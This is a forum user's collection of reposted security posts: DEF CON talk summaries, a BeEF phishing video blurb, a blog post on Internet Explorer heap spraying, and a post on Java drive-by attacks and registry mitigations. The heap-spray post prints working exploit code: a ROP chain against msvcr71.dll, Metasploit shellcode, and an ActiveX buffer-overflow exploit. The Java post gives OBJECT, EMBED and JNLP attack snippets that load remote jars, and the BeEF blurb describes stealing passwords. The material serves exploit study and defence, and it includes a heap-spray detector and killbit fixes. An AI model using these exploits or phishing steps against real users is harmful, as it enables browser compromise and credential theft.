Everything posted by Nytro

  1. Sploitego - Maltego's (Local) Partner In Crime

Description:
PDF: https://media.defcon.org/dc-20/presentations/Douba/DEFCON-20-Douba-Sploitego.pdf
Extra: https://media.defcon.org/dc-20/presentations/Douba/Extras.zip

Have you ever wished for the power of Maltego when performing internal assessments? Ever hoped to map the internal network within seconds? Or that Maltego had a tad more aggression? Sploitego is the answer. In the presentation we'll show how we've carefully crafted several local transforms that give Maltego the oomph to operate nicely within internal networks. Can you say Metasploit integration? ARP spoofing? Passive fingerprinting? SNMP hunting? This all is Sploitego. But wait - there's more. Along the way we'll show you how to use our awesome Python framework that makes writing local transforms as easy as 'Hello World'. Sploitego makes it easy to quickly develop, install, distribute, and maintain Maltego local transforms. The framework comes with a rich set of auxiliary libraries to aid transform developers with integrating attack, reconnaissance, and post-exploitation tools. It also provides a slew of web tools for interacting with public repositories. Sploitego and its underlying Python framework will be released at DEF CON as open source - yup - you can extend it to your heart's content. During the presentation we'll show the awesome power of the tool with live demos and scenarios as well as fun and laughter.

Nadeem Douba - GWAPT, GPEN: Currently situated in the Ottawa (Ontario, Canada) valley, Nadeem is a senior research analyst at Cygnos Information Security (a Raymond Chabot Grant Thornton company). Nadeem provides technical security consulting services to various clients in the health, education, and public sectors. Nadeem has been involved within the security community for over 10 years and has frequently presented at ISSA and company-sponsored seminars and training sessions. He is also an active member of the open source software community and has contributed to projects such as libnet, BackTrack, and Maltego.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Source: Sploitego - Maltego's (Local) Partner In Crime
  2. Hacking The Google Tv

Description:
PDF: https://media.defcon.org/dc-20/presentations/Xenofex/DEFCON-20-Xenofex-Panel-Hacking-the-GoogleTV.pdf

The GoogleTV platform is designed to bring an integrated web experience, utilizing the Chrome web browser and Android applications, to your television. GoogleTV is based on the Android operating system, which is mainly used in tablets and smart phones, but customized with security features not normally seen on most Android devices. The current version of the platform utilizes signatures to establish a "chain of trust" from bootloader to system applications. This presentation will focus on the current GoogleTV devices, including x86 platform details, and the exhaustive security measures used by each device. The presentation will also include video demonstrations of previously found bugs and exploits for each GoogleTV device and includes specific details about how each bug works. Furthermore, we will include interesting experiences that the team has encountered along the way. Finally the talk will be capped off with the release of multiple unpublished GoogleTV exploits which will allow unsigned kernels across all x86 devices (Revue / Sony GoogleTV).

Amir "Zenofex" Etemadieh founded the GTVHacker group and has been working on the GTVHacker project from its initial start in November 2010. Amir has done independent security research in consumer electronics including the Logitech Revue, Ooma Telo, Samsung Galaxy S2, Boxee Box and services such as the 4G Clear Network, finding both hardware and software flaws. Twitter: @zenofex, GTVHacker

CJ Heres is an IT consultant during the day, tinkerer at night. He enjoys examining and repairing all sorts of devices from cars to Blu-ray players. His philosophy is to use a simple approach for complex problems. CJ's recent work includes Sony GoogleTV, Boxee Box, and Vizio Smart TVs. Twitter: @cj_000_

Dan Rosenberg is a vulnerability researcher who takes sick pleasure in exploiting anything with a CPU. He once punched an Android in the face. Twitter: @djrbliss

Tom "tdweng" Dwenger is a software engineer who has been developing and reversing Android for the last 2 years. Tom is known for being able to quickly reverse Android applications and has been an active member of the GTVHacker team since its initial start in 2010. Twitter: @tdweng

Source: Hacking The Google Tv
  3. Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network

Description:
One of the most effective techniques used in CTF is the usage of various exploits, written with the help of well-known tools or even manually during the game. Experience in CTF participation shows that a mechanism for detecting such exploits is able to significantly increase the defense level of the team. In this presentation we propose an approach and a hybrid shellcode detection method, aimed at early detection and filtering of unknown 0-day exploits at the network level. The proposed approach allows us to summarize the capabilities of shellcode detection algorithms developed over the last ten years into optimal classifiers. The proposed approach allows us to reduce the total FP rate almost to 0, provides full coverage of the shellcode classes detected by individual classifiers and significantly increases the total throughput of detectors. Evaluation with shellcode datasets, including Metasploit Framework 4.3 plain-text, encrypted and obfuscated shellcodes, benign Win32 and Linux ELF executables, random data and multimedia, shows that the hybrid data-flow classifier significantly boosts analysis throughput for benign data - up to 45 times faster than a linear combination of classifiers, and almost 1.5 times faster for shellcode-only datasets.

Svetlana Gaivoronski is a PhD student at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Svetlana is a member of the Bushwhackers CTF team which shows the following results in recent years: 2nd place in Deutsche Post Security Cup 2010, 6th place in the final of ruCTF 2012 (8th at qualification), 12th place at ruCTF Europe 2011, 4th place in the final of ruCTF 2011 (and 1st at qualification), etc. Svetlana works at the Redsecure project (experimental IDS/IPS) at Moscow State University. Her primary interests are network worm propagation detection and filtering, shellcode detection, static and runtime analysis of malware. Twitter: @SadieSV, lvk.cs.msu.su/~sadie

Dennis Gamayunov holds a PhD and works as Senior Researcher at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Dennis is the leader of the small network security research group in MSU, project lead of the experimental event-driven and natively multicore Redsecure IDS/IPS, founder of the Bushwhackers CTF team, with primary research and practical interests in network-level malcode detection, high-speed traffic processing (including FPGA-based), and OS security with fine-grained privilege separation, SELinux and beyond. Twitter: @jamadharma, http://redsecure.ru/team/denis-gamayunov

PDF: https://media.defcon.org/dc-20/presentations/Svetlana-Gaivoronski/DEFCON-20-Svetlana-Gaivoronski-Demorpheus.pdf
Extra: https://media.defcon.org/dc-20/presentations/Svetlana-Gaivoronski/Extras.zip

Source: Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network
  4. New Techniques In Sqli Obfuscation: Sql Never Before Used In Sqli

Description:
SQLi remains a popular sport in the security arms race. However, after analysis of hundreds of thousands of real-world SQLi attacks, output from SQLi scanners, published reports, analysis of WAF source code, and database vendor documentation, both SQLi attackers and defenders have missed a few opportunities. This talk will iterate through the dark corners of SQL for use in new obfuscated attacks, and show why they are problematic for regular-expression based WAFs. This will point the way for new directions in SQLi research for both offense and defense.

Nick Galbreath is a director of engineering at Etsy, overseeing groups handling fraud, security, authentication and internal tools. Over the last 18 years, Nick has held leadership positions in a number of social and e-commerce companies, including Right Media, UPromise, Friendster, and Open Market, and has consulted for many more. He is the author of "Cryptography for Internet and Database Applications" (Wiley), and was awarded a number of patents in the area of social networking. He holds a master's degree in mathematics from Boston University. Twitter: @ngalbreath, client9: https://github.com/client9

PDF: https://media.defcon.org/dc-20/presentations/Galbreath/DEFCON-20-Galbreath-SQLi-Obfuscation.pdf

Source: New Techniques In Sqli Obfuscation: Sql Never Before Used In Sqli
  5. Beef Framework Petty Theft

Description:
In this video I will show you how to perform social engineering after hooking the browser. Let's say you made a website and that website needs login credentials; in between you can use your technique and some social engineering to steal Facebook or any other password using your custom logos. This video is all about phishing using BeEF, the Browser Exploitation Framework.

Source: Beef Framework Petty Theft
  6. Heap spraying in Internet Explorer with rop nops

Lately I have been learning to write some exploits for some of my old discovered vulnerabilities to get them working on Windows 7 with IE9. Previously when exploiting vulnerabilities my POCs had always been on Windows XP IE6 just to make sure it worked and not having to worry about all the mitigations in later versions. In this post I am just sharing some basic info which will hopefully help others when writing/understanding exploits for the first time while at the same time keeping it simple and not worrying too much about performance or precision.

In my old exploits I used the heap spraying code below when testing on IE6. (Just removed the "un" from unescape as Symantec's Endpoint Protection doesn't like it in this section, maybe they are just too close to each other as the following unescapes are fine.)

<SCRIPT language="JavaScript">
var calc, chunk_size, headersize, nopsled, nopsled_len;
var heap_chunks, i;

calc = escape("%ucccc?");
chunk_size = 0x40000;
headersize = 0x24;
nopsled = escape("??");
nopsled_len = chunk_size - (headersize + calc.length);
while (nopsled.length < nopsled_len) nopsled += nopsled;
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (i = 0 ; i < 1000 ; i++) heap_chunks[i] = nopsled + calc;
</SCRIPT>

From IE8 things had changed, not only because it supported DEP but the above code did not spray the heap any more. After going through some exploits I realised the only change from the above code I really had to make was spraying the heap using the "substring" function. So the code would now look like this:

code = nopsled + calc;
heap_chunks = new Array();
for (i = 0 ; i < 1000 ; i++) heap_chunks[i] = code.substring(0, code.length);

Trying this heap spray code now on Windows 7 with IE9 again failed to spray. Reading Peter Van Eeckhoutte's heap spraying tutorial on how heap spraying was achieved in IE9 got me thinking to see if I could simplify the code, and after a few tests it literally came down to just changing one byte in each chunk. So my final spray code ended up adding a count to each chunk just to make it unique:

for (i = 0 ; i < 1000 ; i++) {
  codewithnum = i + code;
  heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
}

This code would now spray on all IE browsers and execute our payload on machines that did not support DEP. With machines supporting DEP a ROP chain is required to make our code executable. For this I decided to use ROP chains generated by mona on the library msvcr71.dll which gets shipped with Java 6 and is non-ASLRed. Since the jump to our first gadget needed to be precise I wanted to write JavaScript code where our sprayed chunks would be full of rop nops, saving me the trouble of calculating the precise offset, as offsets might vary between different OSes, plus landing in another chunk might have another offset. Alignment is still an issue at times but just incrementing or decrementing our used return address normally solves the issue. So each chunk would only have one rop + calc shellcode at the end of the chunk instead of multiple shellcode blocks in a chunk. All I did was change the nopsled value to

nopsled = unescape("%q6224?"); // 0x7c376224 RETN [MSVCR71.dll]

Putting it all together we now get a working script for Internet Explorer 6/7/8 and 9. (I had to replace the u with a q otherwise the formatting on the browser gets messed up.)

<SCRIPT language="JavaScript">
function padnum(n, numdigits) {
  n = n.toString();
  var pnum = '';
  if (numdigits > n.length) {
    for (z = 0; z < (numdigits - n.length); z++) pnum += '0';
  }
  return pnum + n.toString();
}

var rop, calc, chunk_size, headersize, nopsled, nopsled_len, code;
var heap_chunks, i, codewithnum;

//
// !mona rop -m msvcr71.dll
// * changed from default mona rop chain output
//
rop = unescape(
  "%q2e4d%q7c36" + // 0x7c362e4d, # POP EBP # RETN
  "%q2e4d%q7c36" + // 0x7c362e4d, # skip 4 bytes
  "%qf053%q7c34" + // 0x7c34f053, # POP EBX # RETN
  "%q00c8%q0000" + // 0x000000c8, # 0x000000c8-> ebx (size 200 bytes) *
  "%q4364%q7c34" + // 0x7c344364, # POP EDX # RETN
  "%q0040%q0000" + // 0x00000040, # 0x00000040-> edx
  "%qf62d%q7c34" + // 0x7c34f62d, # POP ECX # RETN
  "%qe945%q7c38" + // 0x7c38e945, # &Writable location
  "%q496e%q7c36" + // 0x7c36496e, # POP EDI # RETN
  "%q6c0b%q7c34" + // 0x7c346c0b, # RETN (ROP NOP)
  "%q2adb%q7c37" + // 0x7c372adb, # POP ESI # RETN
  "%q15a2%q7c34" + // 0x7c3415a2, # JMP [EAX]
  "%q4edc%q7c34" + // 0x7c344edc, # POP EAX # RETN
  "%qa151%q7c37" + // 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF *
  "%q8c81%q7c37" + // 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
  "%q5c30%q7c34"); // 0x7c345c30, # ptr to 'push esp # ret '

//
// ruby msfpayload windows/exec cmd=calc.exe J
// windows/exec - 200 bytes
// http://www.metasploit.com
// VERBOSE=false, EXITFUNC=process, CMD=calc.exe
//
calc = unescape(
  "%qe8fc%q0089%q0000%q8960%q31e5%q64d2%q528b%q8b30" +
  "%q0c52%q528b%q8b14%q2872%qb70f%q264a%qff31%qc031" +
  "%q3cac%q7c61%q2c02%qc120%q0dcf%qc701%qf0e2%q5752" +
  "%q528b%q8b10%q3c42%qd001%q408b%q8578%q74c0%q014a" +
  "%q50d0%q488b%q8b18%q2058%qd301%q3ce3%q8b49%q8b34" +
  "%qd601%qff31%qc031%qc1ac%q0dcf%qc701%qe038%qf475" +
  "%q7d03%q3bf8%q247d%qe275%q8b58%q2458%qd301%q8b66" +
  "%q4b0c%q588b%q011c%q8bd3%q8b04%qd001%q4489%q2424" +
  "%q5b5b%q5961%q515a%qe0ff%q5f58%q8b5a%qeb12%q5d86" +
  "%q016a%q858d%q00b9%q0000%q6850%q8b31%q876f%qd5ff" +
  "%qf0bb%qa2b5%q6856%q95a6%q9dbd%qd5ff%q063c%q0a7c" +
  "%qfb80%q75e0%qbb05%q1347%q6f72%q006a%qff53%q63d5" +
  "%q6c61%q2e63%q7865%q0065");
//
chunk_size = 0x40000;
headersize = 0x24;
nopsled = unescape("%q6224%q7c37"); // 0x7c376224 RETN [MSVCR71.dll]
nopsled_len = chunk_size - (headersize + rop.length + calc.length);
while (nopsled.length < nopsled_len) nopsled += nopsled;
nopsled = nopsled.substring(0, nopsled_len);
code = nopsled + rop + calc;
heap_chunks = new Array();
for (i = 0 ; i < 1000 ; i++) {
  codewithnum = padnum(i,4) + code;
  heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
}
</SCRIPT>

Here are two images from the top and bottom of one of the chunks. One thing to note is that the calc shellcode size in the above example is 200 bytes and this size needs to be set in our rop chain. Due to the fact that the shellcode is at the bottom of the chunk, if the size used by VirtualProtect is greater than our shellcode it reads past the chunk, leading to an invalid address and triggering an exception.

Here is an example of an exploit I wrote for testing purposes. I discovered this one quite some time ago. The ActiveX library awApi4.dll from "Vantage Linguistics AnswerWorks" contains a number of vulnerable stack-based buffer overflow methods. The Secunia advisory link is here. The ActiveX control had been killbitted at the time with a Microsoft patch, MS07-069/942615.

<OBJECT classid="clsid:C1908682-7B2C-4AB0-B98E-183649A0BF84" id="poc"> </OBJECT>
<SCRIPT language="JavaScript">
var buffer = "";
for (i = 0; i < 215; i++) buffer += unescape("%41")
buffer += unescape("%23%62%37%7c") // 0x7c376223 POP EAX # RETN
buffer += unescape("%42%42%42%42") // compensate
buffer += unescape("%42%42%42%42") // compensate
buffer += unescape("%08%08%08%08") // fill return address
buffer += unescape("%a9%13%34%7c") // XCHG EAX,ESP # MOV EAX,DWORD PTR DS:[EAX] # PUSH EAX # RETN
buffer += unescape("%24%62%37%7c") // 0x7c376224 RETN
for (i = 0; i < 20; i++) buffer += unescape("%43")
poc.GetHistory(buffer);
</SCRIPT>

This exploit has been tested and works 100% on Windows XP SP3 IE 6/7/8 and Windows 7 SP1 IE 8/9. I have included the vulnerable library, registry files to remove/add killbits and the exploit in a zip file that can be downloaded from here. The zip file has an md5 hash of d219582269ee0845f8747d0b64910f71 and the password for the zip file is "answerworks" without quotes. If you find when testing the exploit that Windows Calculator fails to load then check if the msvcr71.dll library is loaded in IE's process space, as I had noticed on one of my test machines that it does not load up.

This heap spraying code should work well for exploiting buffer overflows but exploiting virtual function calls is something I'll need to look into and is on my to-learn list. On Windows 7 the only real dependency lies in having Java 6 installed, as the library msvcr71.dll which comes with Java 6 is not ASLRed and does not get rebased. If Java 7 is installed then another rop chain would need to be used as Java 7 libraries are all ASLRed. Windows XP is not subject to ASLR so another rop chain could be used if Java 6 is not installed.

References:
Security Advisory SA26566 - Vantage Linguistics AnswerWorks 4 API ActiveX Control Buffer Overflow - Secunia
Security Vulnerability Patch for iSEEK AnswerWorks Desktop Help Search
Microsoft Security Bulletin MS07-069 - Critical: Cumulative Security Update for Internet Explorer (942615)
https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/

Source: Heap spraying in Internet Explorer with rop nops | GreyHatHacker.NET
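From the detection side, the spray variants the post walks through share a few textual idioms: a short %u-encoded seed, the "x += x" growth loop, a large array fill, and a 64 KiB-plus chunk size. The heuristic scanner below is an added example, not code from the post or from GreyHatHacker.NET; the two JavaScript samples it scans are constructed here and contain dummy values rather than a real gadget address or shellcode.

```python
import re

# Idioms from the post's spray code: a %u-encoded seed, the "x += x" growth
# loop, a for-loop filling an array with copies, and a large hex chunk size.
UNESCAPE_RE = re.compile(r'unescape\(\s*"((?:%u[0-9a-fA-F]{4})+)"\s*\)')
DOUBLING_RE = re.compile(r'while\s*\(\s*(\w+)\.length\s*<\s*\w+\s*\)\s*\1\s*\+=\s*\1\b')
FOR_RE = re.compile(r'for\s*\(\s*(\w+)\s*=\s*0\s*;\s*\1\s*<\s*(\d+)\s*;')
HEXCONST_RE = re.compile(r'=\s*0x([0-9a-fA-F]{5,})\b')

SEED_MAX = 8         # a sled seed is a few bytes that later get doubled up
PAYLOAD_MIN = 64     # a %u literal this long looks like shellcode or a ROP chain
FILL_MIN = 100       # arrays filled in smaller loops are ordinary page code
CHUNK_MIN = 0x10000  # block sizes of 64 KiB and up are typical of sprays


def decode_unescape(literal):
    """Return the bytes IE stores for a %uXXYY literal (UTF-16LE, so YY XX)."""
    out = bytearray()
    for hexpair in re.findall(r'%u([0-9a-fA-F]{4})', literal):
        out += bytes.fromhex(hexpair)[::-1]
    return bytes(out)


def repeated_dword(data):
    """If data is one 32-bit value repeated, return it as hex, else None."""
    if len(data) < 4 or len(data) % 4:
        return None
    first = data[:4]
    if all(data[i:i + 4] == first for i in range(0, len(data), 4)):
        return "0x%08x" % int.from_bytes(first, "little")
    return None


def scan_js(source):
    """Score a script for heap-spray idioms; returns indicators and a verdict."""
    indicators = []
    sled_dword = None

    def note(tag):
        if tag not in indicators:
            indicators.append(tag)

    for literal in UNESCAPE_RE.findall(source):
        data = decode_unescape(literal)
        if len(data) <= SEED_MAX:
            note("short_unescape_seed")
            sled_dword = sled_dword or repeated_dword(data)
        elif len(data) >= PAYLOAD_MIN:
            note("long_unescape_payload")
    if DOUBLING_RE.search(source):
        note("doubling_growth_loop")
    for m in FOR_RE.finditer(source):
        var, count = m.group(1), int(m.group(2))
        window = source[m.end():m.end() + 160]   # look just past the loop header
        if count >= FILL_MIN and re.search(r'\w+\[\s*%s\s*\]\s*=' % re.escape(var), window):
            note("large_array_fill(%d)" % count)
    if any(int(h, 16) >= CHUNK_MIN for h in HEXCONST_RE.findall(source)):
        note("large_chunk_size")

    # The growth loop plus a large fill is the core of every variant in the post.
    likely = "doubling_growth_loop" in indicators and any(
        i.startswith("large_array_fill") for i in indicators)
    return {"indicators": indicators, "sled_dword": sled_dword,
            "likely_heap_spray": likely}


# Constructed samples (not from the post): the first mirrors the post's spray
# structure with dummy values in place of the gadget and shellcode, the second
# is ordinary page script that also calls unescape() and fills an array.
SPRAY_SAMPLE = r'''
<SCRIPT language="JavaScript">
var chunk_size = 0x40000, headersize = 0x24;
var payload = unescape("%u9090%u9090%u4141%u4242%u4343%u4444%u4545%u4646");
var sled = unescape("%u4141%u4242");
var sled_len = chunk_size - (headersize + payload.length);
while (sled.length < sled_len) sled += sled;
sled = sled.substring(0, sled_len);
var code = sled + payload;
var chunks = new Array();
for (i = 0; i < 1000; i++) {
  var c = i + code;
  chunks[i] = c.substring(0, c.length);
}
</SCRIPT>
'''

BENIGN_SAMPLE = r'''
var title = unescape("%u00e9%u00e8");
var rows = new Array();
for (i = 0; i < 10; i++) rows[i] = "row " + i;
'''

if __name__ == "__main__":
    for name, src in (("spray", SPRAY_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan_js(src))
```

The reported sled_dword is the repeated return address that a chunk would be filled with, which is the value worth correlating with non-ASLR modules such as msvcr71.dll when triaging a capture.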
  7. Exploiting and mitigating Java exploits in Internet Explorer This year we’ve seen a number of 0 day Java exploits surfacing and various mitigating steps mentioned in various sites that could be taken to prevent us from being compromised. A lot of these mitigating steps vary from each other so when it comes to mitigate Java in Internet Explorer it adds doubt to which is the best mitigation steps to follow. Uninstalling Java would obviously solve the problem but that is not really an option in organisations dependant on Java. This post describes the mitigating steps available, the tests carried out and how to bypass certain mitigations. The tests have been carried out on a fully patched Windows 7 Enterprise 32bit virtual machine with Internet Explorer 8 and a vulnerable version of Java. Prevent loading of applet in IE’s “Internet Zone” This setting disables the loading of Java applets from the Internet zone. There are different keys representing different security zones [3] and the Internet zone has a value of 3. ; First set the URLAction to control APPLET behavior ; Zone 3 is the Internet zone ; 1C00 is the Java invocation policy ; "1C00"=dword:00000000 <-- disable loading of Java applet ; "1C00"=dword:00010000 <-- enable loading of Java applet ; [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] "1C00"=dword:00000000 HKEY_CURRENT_USER (HKCU) entry would take priority first. So if disabled in HKEY_LOCAL_MACHINE (HKLM) but enabled in HKCU then you will still be exploited so it is best just to apply the change in HKCU. Any external site attempting to use an applet tag will now not load the applet and a notification bar will be displayed. This mitigation would only protect from applet tag examples below. With other techniques this mitigation is ineffective. 
<APPLET archive="calc.jar" code="Exploit.class" width="1" height="1"></APPLET> <APPLET code="Exploit.class" width="1" height="1"></APPLET> Prevent loading of applet in all IE zones This settings stops the loading of Java in all IE browser zones. This might be a problem internally in organisations which depend on the applet tag. ; "UseJava2IExplorer"=dword:00000000 <-- disable loading of Java applet ; "UseJava2IExplorer"=dword:00000001 <-- enable loading of Java applet ; [HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java Plug-in\10.7.2] "UseJava2IExplorer"=dword:00000000 An issue with this mitigation is that each time Java is installed the mitigation gets reset to its default value as a new Java version registry key is added. 10.4.0 – Java 7 update 4 10.6.2 – Java 7 update 6 10.7.2 – Java 7 update 7 10.9.2 – Java 7 update 9 Once mitigation has been made a popup would be seen first time. If the check box is ticked “Do not show this message again” it writes to the registry entry below [HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Declined Install On Demand IEv5] "{08B0e5c0-4FCB-11CF-AAA5-00401C608501}"="" This mitigation only stops exploits using the applet tag, cannot be managed by Internet Explorer zones and any new Java update means you’ll need to update the registry again. Invoking Java classids via OBJECT tag Internet Explorer can use the classid attribute OBJECT tag to load Java. Hundreds of Java classids gets registered when Java is installed. One classid is particularly dangerous as it works transparently from the Internet zone without any notification bars or alerts and has been used in actual exploits. The reason being is that this classid gets added in the preapproved list. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{8AD9C840-044E-11D1-B3E9-00805F499D93} This classid calls the latest installed version of Java Plug-in installed on the machine. 
Whats interesting is that this classid is already added in Windows 7 preapproved registy key without even Java being installed. To mitigate this classid needs to be killbitted [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{8AD9C840-044E-11D1-B3E9-00805F499D93}] "Compatibility Flags"=dword:00000400 To exploit it can be called like this <OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> Another way to mitigate this classid is to disable the Java Plugin’s ActiveX control through IE’s “Manage Add-ons”. Once disabled it writes to the registry below and settings are retained even after a Java update though I prefer the killbit option. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{8AD9C840-044E-11D1-B3E9-00805F499D93}] "Flags"=dword:00000001 "Version"="*" The hundreds of other classids are mainly for backwards compatibility. So if an older specific version of Java is installed, those can be called using a specific classid, in the example below its calling Java 7 update 7 <OBJECT classid="clsid:CAFEEFAC-0017-0000-0007-ABCDEFFEDCBA" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> Or to invoke the latest Java 7 version installed <OBJECT classid="clsid:CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> The way the classid versions is worked out is in say CAFEEFAC-xxxx-yyyy-zzzz-ABCDEFFEDCBA, “xxxx”, “yyyy”, and “zzzz” are four-digit numbers to identify the specific version of Java Plug-in to be used. In references [1][2] only a handful of classid’s listed below but actually when Java gets installed it installs hundreds of classids. Click here to see all the CAFEEFAC- classid’s registered on a Java 7 update 4 installation. 
In these references just killbitting these classids does not make sense as invoking any other classid will give the same two prompts as these ones. (screenshots given further down in the Java Web Start ActiveX control section). So if you are thinking of killbitting these classids then follow Cert’s recommendation [4] as it kills all classids upto a certain version. A Java update will register newer classids each time so if killbitting these is an option you prefer then you’ll need to keep uptodate. These classid’s are the only ones mentioned for Java version 7 and upto update 6. CAFEEFAC-0017-0000-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0001-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0002-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0003-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0004-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0005-FFFF-ABCDEFFEDCBA CAFEEFAC-0017-0006-FFFF-ABCDEFFEDCBA CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA So CAFEEFAC-0017-0006-FFFF-ABCDEFFEDCBA might have been killbitted but if you know the Java version you are attacking you could use CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA CAFEEFAC-0017-0000-0006-ABCDEFFEDCBB CAFEEFAC-0017-0000-0006-ABCDEFFEDCBC Another classid registered invokes an old version of Java and to exploit using this classid you’ll have to deal with a third warning window prompt and thiswould come up everytime. To exploit <HTML> <OBJECT CLASSID="clsid:E19F9331-3110-11D4-991C-005004D3B3DB" width="1" height="1"> <PARAM name="code" value="Exploit.class"> </OBJECT> </HTML> And to mitigate killbit the control [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{E19F9331-3110-11D4-991C-005004D3B3DB}] "Compatibility Flags"=dword:00000400 Loading Java via the EMBED tag Java can also be exploited in Internet Explorer using the EMBED tag. Here applet mitigations is ineffective but killbitting/disabling the ActiveX control 8AD9C840-044E-11D1-B3E9-00805F499D93 as mentioned in previous section mitigates it. 
To exploit <HTML> <EMBED code="Exploit.class" type="application/x-java-applet" width="1" height="1"></EMBED> </HTML> Here the the mimetype “application/x-java-applet” points back to classid 8AD9C840-044E-11D1-B3E9-00805F499D93 Prevent automatically opening JNLP files via APPLET Java Network Launch Protocol (JNLP) could also be used for launching applets directly from JNLP files. To launch an applet from a JNLP file the “jnlp_href” parameter would need to be used in the applet tag. This could be used in a transparent driveby attack too. <HTML> <APPLET><param name="jnlp_href" value="mycalc.jnlp"></APPLET> </HTML> The jnlp file doesnt need to contain the full url path <?xml version="1.0" encoding="UTF-8"?> <jnlp href="mycalc.jnlp"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+" /> <jar href="calc.jar" main="true" /> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> When calling the jnlp file via the html file the jnlp file can be any extension so say in the above code mycalc.jnlp could be called mycalc.txt. Since this uses the applet tag the above mitigation on the applet would mitigate this threat. Double-clicking on a JNLP file Even with all the browser mitigations in place it doesnt stop an attacker to email a jnlp file to the victim. Just by double-clicking the attachment would compromise the machine. <?xml version="1.0" encoding="UTF-8"?> <jnlp href="mycalc.jnlp"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+" /> <jar href="http://192.168.1.3/calc.jar" main="true"/> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> One way to mitigate is to change the file association and/or block jnlp file attachments on your mail relays. 
HKLM\SOFTWARE\Classes\JNLPFile\Shell\Open\Command\: “”C:\Program Files\Java\jre7\bin\javaws.exe” “%1?” Prevent automatically opening JNLP files via mimetype association Using Java Web Start can be used to open a JNLP file. By default JNLP files open without any interaction from the user. For this to be exploited the web server would have to be configured with the .jnlp file extension to the mimetype “application/x-java-jnlp-file”. Then simply visiting a link say http://192.168.1.3/mycalc.jnlp would compromise your box. <?xml version="1.0" encoding="utf-8"?> <jnlp href="mycalc.jnlp" codebase="http://192.168.1.3/"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+"/> <jar href="calc.jar" main="true"/> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> Signing your own app and using jnlp code below could be used but user interaction is required and you don’t need a vulnerability for this one. <?xml version="1.0" encoding="utf-8"?> <jnlp href="mycalc.jnlp" codebase="http://192.168.1.3/"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <security> <all-permissions/> </security> <resources> <jar href="mycalc_signed.jar" main="true"/> </resources> <application-desc name="Calculator" main-class="mycalc" width="1" height="1"> </application-desc> </jnlp> To mitigate we can change the default setting of EditFlags to all zeros which will then prompt the user. [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JNLPFile] "EditFlags"=dword:00000000 On the Cert advisory EditFlags is a binary value but a dword value can also be used. Prevent automatically opening JNLP files via ActiveX Control Using Java Web Start ActiveX control can also be used to run a JNLP file but user interaction is required. 
To exploit <HTML> <OBJECT CLASSID="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" width="1" height="1"> <PARAM name="app" value="http://192.168.1.3/mycalc.jnlp"> </OBJECT> </HTML> and the JNLP file is <?xml version="1.0" encoding="UTF-8"?> <jnlp href="mycalc.jnlp"> <information> <title>Calculator</title> <vendor>POC</vendor> </information> <resources> <j2se version="1.7+" /> <jar href="calc.jar" main="true" /> </resources> <applet-desc name="Calculator" main-class="Exploit" width="1" height="1"> </applet-desc> </jnlp> To mitigate killbit this classid [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{5852F5ED-8BF4-11D4-A245-0080C6F74284}] "Compatibility Flags"=dword:00000400 Java Deployment Toolkit ActiveX Controls This Java Deployment Toolkit classid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA was exploited in 2010 (CVE-2010-1423). On a fully patched Windows 7 machine this has already been killbitted without even Java being installed and points to an alternate classid CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA. This classid has been killbitted in Cert’s mitigation so its recommended to keep this one killbitted too. [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}] "Compatibility Flags"=dword:00000400 Preventing compromise So what it comes down to is just these few changes on your system prevent it from being compromised automatically by a drive by attack. 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JNLPFile]
"EditFlags"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1C00"=dword:00000000

